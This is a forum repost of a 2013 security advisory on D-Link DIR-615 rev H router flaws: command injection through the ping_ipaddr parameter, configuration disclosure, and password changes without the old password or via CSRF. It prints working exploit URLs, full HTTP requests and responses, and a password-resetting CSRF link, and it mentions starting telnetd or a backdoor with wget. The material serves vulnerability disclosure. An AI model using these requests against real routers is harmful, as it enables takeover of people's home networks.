Praetorian503 Posted February 12, 2013 Report Share Posted February 12, 2013 D-Link DIR-615 rev H suffers from cross site request forgery, information disclosure, and remote command injection vulnerabilities.Device Name: DIR-615 - Hardware revision H1Vendor: D-Link============ Device Description: ============Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router============ Vulnerable Firmware Releases: ============Firmware Version : 8.04, Tue, 4, Sep, 2012Firmware Version : 8.04, Fri, 18, Jan, 2013============ Vulnerability Overview: ============* OS-Command Injection: => Parameter: ping_ipaddrThe vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device.You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.Example Exploit:http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=Request:GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0Accept: */*Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://192.168.178.199/adv_virtual_batch.htmConnection: keep-aliveResponse:HTTP/1.0 200 OKPragma: no-cacheContent-Type: text/html<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><script type="text/javascript" src="common.js.htm"></script><script language="javascript">CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});var pingResult="Domain";var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==var vctinfo= [{ethport:'0', status:'0', rate:'0', dup:'0'},{ethport:'1', status:'0', rate:'0', dup:'0'},{ethport:'2', status:'0', rate:'0', dup:'0'},You have wget on the device for downloading further tools.* Information Disclosure:Detailed device information with configuration details.Request:http://192.168.178.199/gconfig.htmResponse:var ModelName = 'DIR-615'; var systemName='DLINK-DIR615'; var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}* For changing the current password there is no request to the current passwordWith this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.POST /tools_admin.htm HTTP/1.1Host: 192.168.178.199User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateProxy-Connection: keep-aliveReferer: http://192.168.178.199/tools_admin.htmCookie: uid=wBIfbpFoJ9Content-Type: application/x-www-form-urlencodedContent-Length: 77page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615* CSRF for changing the password without knowing the current one:http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615============ Solution ============No known solution available.============ Credits ============The vulnerability was discovered by Michael MessnerMail: devnull#at#s3cur1ty#dot#deWeb: http://www.s3cur1ty.de/advisoriesTwitter: @s3cur1ty_de============ Time Line: ============November 2012 - discovered vulnerability11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link21.12.2012 - D-link responded that they will check the findings *h00ray*11.01.2013 - requested status update25.01.2013 - requested status update25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fixxx.02.2013 - no update from dlink, public release===================== Advisory end =====================Source: PacketStorm Quote Link to comment Share on other sites More sharing options...